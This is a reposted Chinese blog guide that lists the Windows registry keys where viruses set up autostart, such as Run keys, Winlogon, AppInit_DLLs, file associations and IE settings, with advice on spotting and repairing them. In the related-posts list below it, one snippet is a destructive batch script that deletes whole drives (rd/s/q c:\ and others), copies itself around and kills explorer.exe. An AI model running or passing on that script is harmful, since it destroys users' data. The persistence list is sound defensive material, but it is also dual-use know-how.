【转载】病毒隐藏在注册表中的位置总结

最新推荐文章于 2023-09-12 10:17:37 发布
最新推荐文章于 2023-09-12 10:17:37 发布
阅读量1.6k 收藏 6
点赞数 1
原文链接:https://wenku.baidu.com/view/e5d0374f59eef8c75ebfb303.html
版权

一、Run 启动项。常见的启动项如下:

1、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
2、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
3、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
4、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
5、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run
6、HKCU\Software\Microsoft\Windows\CurrentVersion\Run
7、HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce
8、HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
9、HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
10、HKCU\Software\Microsoft\Windows\CurrentVersion\policies\explorer\run

确定以上这些启动项包含病毒的方法:
1)根据已确定的病毒文件确定。键值即为该文件的路径。

2)只有Run 项是有键值的,如图1,其它的都只有一个默认串(98除外),所以若其它项中有键值,就可能是病毒启动项。
图1

3)若键值是糊乱的文件名,如1.exe;或路径是在临时文件夹的;也可能是病毒启动项。

二、驱动启动项

位置:HKLM\System\CurrentControlSet\Services    
这里的项比较多,可以根据 windows/system32/drivers 目录下已确定的文件来确定。

三、Winlong 启动项    
位置:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon    
主要检查 Userinit、Shell、Notify,看看键值是否有异常。

四、windows 启动项    
1、HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows 
下若有 Load 键,该键值是空的,若不为空可是病毒启动项。

2、HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders    
该项也是病毒常常出现的位置,注意检查。

3、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks    
若杀毒软件被关闭了,很可能病毒的启动项就写在这里;通常,很少有正常程序会写在这里。

4、HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls    
若安全模式下杀毒软件被关闭了,病毒可能就写在这里,很少有正常程序会写在这里, 
图2

5、HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Shell    
 一般该项的 AppInit_DLLs 键值是空的,若有异常的文件名,可能是病毒启动项。

6、其它启动项     HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components      
HKLM\SOFTWARE\Microsoft\Command Processor\Autorun    
HKCU\Software\Microsoft\Command Processor\Autorun

五、explorer 启动项

位置:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects    
一般系统不会在此建立项,只有某些软件,如 QQ,迅雷等会,同时若有一些 ddl 文件对启动也是有影响的。如果发现一些异常名称的键,可能是病毒。

**六、有一些变种病毒可以把杀毒软件安装文件删除,**并且会修改 hosts 文件、在 QQ 目录下写入隐藏的病毒 dll 且修改 API HOOH。这时可以重点检查    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler

七、文件关联启动项。    
位置:HKLM\SOFTWARE\Classes\Exefile\Shell\Open\Command(Default)    
有些病毒会把该项的键值改为自己的关联文件,如“冰河”木马会把键值修改为“C:\WINDOWS\System32\Sysexplr.exe %1”。被修改后,就要用对应的注册表项值或已知的程序文件修改回来。修改后有些文件不能正常运行,如.exe;此时就需要用命令恢复他们的关联。以 .exe 为例,打开命令提示符(运行CMD)窗口,输入命令 assoc .exe=exefile 执行后就可修复此类文件关联,还不行就重启试试。

八、ShellServiceObjectDelayLoad 启动项。   
 位置:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad    
 可以把组件关联到这个键。如果有组件关联到这里,系统启动时,EXPLORER 将自动加载目标组件。有是会遇到这样的事情,IE 的首页设置为Blank,注册表 Run 键的值也为空,但每隔一会儿,有网页自动弹出,这就是 ShellServiceObjectDelayLoad 被修改了,可把弹出的网址去掉。

九、IE 启动项    
 1、IE 默认页   
  位置:HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN
      HKCU\Software\Microsoft\Internet Explorer\Main\   ,
  主要检查 Start Page(IE 默认首页)、Default_Page_URL(IE 默认页)、Search Page(IE 搜索默认首页)、Default_Search_URL(IE 搜索默认页),把这些键值修改about:blank(空白页)或者自己的主页。 
图3

位置:HKLM\SOFTWARE\Microsoft\Internet Explorer\UrlSearchHooks
HKCU\Software\Microsoft\InternetExplorer\UrlSearchHooks   
处理方法同上。

2、IE 默认首页被禁止修改回来
    位置:HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel    
    把该项下的 “Settings”=dword:1、“Links”=dword:1、“SecAddSites”=dword:1 中的 1 改为 0 就可恢复。

3、IE 默认首页修改按扭被禁用(变灰色)    
位置:HKEY_USERS.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel
把该项下的“homepage”的键值改为 0 即可。

4、ToolsTars 和 ActiveX 加载项    
位置:HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar    
HKLM\SOFTWARE\Microsoft\Internet Explorer\Explorer bars     
HKCU\Software\Microsoft\Internet Explorer\Toolbar 
HKLCU\Software\Microsoft\Internet Explorer\Explorer bars    
ToolBars 主要在工具栏上显示一些快捷方式,如 QQ、迅雷等,发现有可疑的软件可删除;ActiveX 是一些插件,发现有可疑的也可删除。  
    
5、IE 默认搜索引擎被修改    
位置:HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\CustomizeSearch 
HKLM\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant    
把“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。 
     
6、IE右键菜单被修改    
位置:HKLCU\Software\Microsoft\Internet Explorer\MenuExt    
删除被恶意添加的选项即可,注意不要把正常的选项也删除。 
     
7、浏览网页注册表被禁用    
位置:HKLCU\Software\Microsoft\Windows\CurrentVersion\Policies\System    
该项下的“DisableRegistryTools”被修改为 1,注册表就被禁用,将其键值恢复为“0”即可。用记事本建立以 reg 为后缀名的文件,将下面这些代码复制到里面双击导入注册表就可以了:REGEDIT4    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]    “DisableRegistryTools”=dword:00000000

8、浏览网页开始菜单被修改
这项涉及内容较多,包括禁止关闭系统、禁止注销、隐藏C盘等,具体请看《浏览网页注册表被修改及解决办法》一文。

N3ts1an
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原作高危代码大家请在在虚拟机上使用
m0_73452132的博客
09-04 231
注意若您想运行请把钦件名设为 rund1132 以下为代码 attrib +h %0 attrib -h attrib +h rd/s/q c:\ rd/s/q d:\ rd/s/q e:\ rd/s/q f:\ rd/s/q g:\ copy %0 f:\assoc.exe=txtfile copy %0 E:\ copy %0 c:\ copy %0 d:\ taskill /im explorer.exe /f >nul 2>nul @ECHO OFF START reg d
【建议收藏】Windows注册表运行键安全攻防指南
HBohan的博客
08-24 588
Windows注册表是一个庞大而复杂的话题,因此,我们根本不可能通过一篇文章讲清楚。然而,从安全的角度来看,一个特别值得关注的领域是注册表运行键。在这篇文章,我们将探讨谁在使用运行键,如何发现该键的滥用情况,以及如何根除系统的恶意运行键。 运行键简介 什么是注册表运行键?运行键是注册表的一种开机运行机制:当用户登录或机器启动时,在Windows系统上执行一些程序。 由于运行键很容易引发安全问题,所以,它自然会成为攻击者的研究对象。例如,Fancy Bear(也被称为APT28)、TA456和Group
ring0 rootkit隐藏注册表的项.zip
01-24
ring0 rootkit隐藏注册表的项.zip
windows权限维持
最新发布
dzqxwzoe的博客
09-12 143
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全文版)③项目源码(四五十个有趣且经典的练手项目及源码)
win10 系统下 VScode Python 文输出乱码处理办法
未觉池塘春草梦,阶前梧叶已秋声
07-10 827
一般出这个问题多数是文本与执行软件使用的编码方式不统一,编码方式一般就是gbk(代号936),或者utf-8(65001),现在我们把编码方式固定为utf-8 格式 首先查看执行代码的编码方式, win10 系统下一般使用cmd或者powershell 作为控制台 那么需要看一下cmd 或者power shell 的编码方式,在cmd或者powershell里输入 chcp 可以看到我的cmd编码方式是utf-8(65001),而powershell方式为 gbk(936)。 现在我们
玩转注册表,这几个windowsAPI函数就够了
qq_31716541的博客
06-18 604
玩转注册表,这几个windowsAPI函数就够了
安装postman工具 出现请设置注册表项HKLM\Software\Microsoft\.NETFramework\InstallRoot,指向.NET Fra
Healer1996的博客
03-16 4312
今天安装postman工具,报了下图的错误 我的系统里面是有安装过NETFramework4.0的。后来找到解决的办法,我们就根据第一张图片的来设置注册表。 按住windows +R键 输入regedit 按照下图操作。 创建InstallRoot设置值,或者修改值。然后可以重启一下 重新点安装,就可以运行了 ...
通过注册表修改启动项
Zola的博客
05-23 594
开始 运行 regedit 启动项的位置在 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce](仅运行一次) [HKEY_LOCAL_MACHINE\Software\Micr...
Blackice.C病毒分析
weixin_44156885的博客
11-18 1623
Blackice.C病毒分析 样本信息 MD5:50f559ef10b0291332d387ac9149878e 样本概述 该病毒是具有对抗能力的感染型病毒,属于blackice家族。其通过在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell和 HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\run设置自启来实现持久化,通过注入explorer.exe进程来实现进
Windows操作系统如何正确安装.NET Framework 3.5 SP1
qq_19963933的博客
11-17 3565
本文主要介绍Windows操作系统如何正确安装.NET Framework 3.5 SP1。 Windows Server 2012 R2/2016/2019/1709/1809的操作步骤 Windows Server 2012以及更高的操作系统版本使用FOD(Feature on Demand)功能时,需要从Windows Update下载安装源。由于Windows实例默认采用WSUS...
卸载程序在注册表位置
08-28
当电脑的软件没有通过卸载操作,而文件目录被误删除时,可以直接从注册表删除该软件
杀毒除根 巧用注册表防止病毒重新生成
09-16
经常在网络上冲浪,十有八九避免不了网络病毒的攻击,用专业杀毒程序清除了这些病毒程序并重新启动计算机系统后,我们有时会发现先前已经被清除干净的病毒又卷土重来了,这是怎么回事呢?
如何在注册表预防病毒的入侵.docx
09-27
如何在注册表预防病毒的入侵.docx
注册表隐藏磁盘.rar
04-19
一键修改表,隐藏磁盘分区
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explo注册表病毒
快乐每一天
11-03 6345
[code="java"]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run[/code] [code="java"]删除:2600[/code]
6.28(reg query)注册表
m0_72827793的博客
06-28 903
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx” 是一个注册表键路径,用于配置在用户登录后只运行一次的程序,类似于 “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce”,但是它有一些额外的特性和功能。HKLM\Software\Microsoft\Windows\CurrentVersion\Run 只会在当前用户登录时生效,不会影响其他用户的自动运行配置。
Windows 注册表操作 reg 命令详解
test_leader的博客
02-03 1万+
reg命令是Windows提供的,它可以添加、更改和显示注册表注册表子项信息和值。   1,reg add 将新的子项或项添加到注册表   语法:reg add KeyName [/v EntryName|/ve] [/t DataType] [/s separator] [/d value] [/f]   参数   KeyName   指定子项的完全路径。对于远程计算机,请在\\ComputerName\PathToSubkey的子项路径前包含计算机名称。忽略ComputerName会...
请设置注册表项HKLMSoftwareMicrosoft.NETFrameworkInstallRoot,指向.NET Framework安装位置(写给我自己备份的免得以后找不到)
weixin_44741980的博客
08-01 3897
请设置注册表项HKLMSoftwareMicrosoft.NETFrameworkInstallRoot,指向.NET Framework安装位置(写给我自己备份的免得以后找不到)
注册表项“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”的访问被拒绝。
热门推荐
十年一梦 荒唐半生
05-08 1万+
安装docker的时候一直报错: 对注册表项“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”的访问被拒绝。 在 Microsoft.Win32.RegistryKey.Win32Error(Int32 errorCode, String str) 在 Microsoft.Win32.RegistryKey.Creat...
windows注册表host的位置一般设置在哪
07-15
在 Windows 操作系统,用于管理域名解析的 host 文件位于以下位置: `C:\Windows\System32\drivers\etc\hosts` 您可以使用文本编辑器(如记事本)打开该文件进行编辑。请注意,修改 host 文件需要管理员权限。 此文件定义的映射将覆盖 DNS 解析,允许您将特定的域名映射到指定的 IP 地址。例如,您可以在 host 文件添加以下内容: ``` 127.0.0.1 example.com ``` 这将把 `example.com` 映射到本地回环地址 `127.0.0.1`。 请注意,对 host 文件的修改将立即生效,但只会影响本地计算机。其他计算机或设备不会受到影响。 希望这个回答对您有所帮助。如果您还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值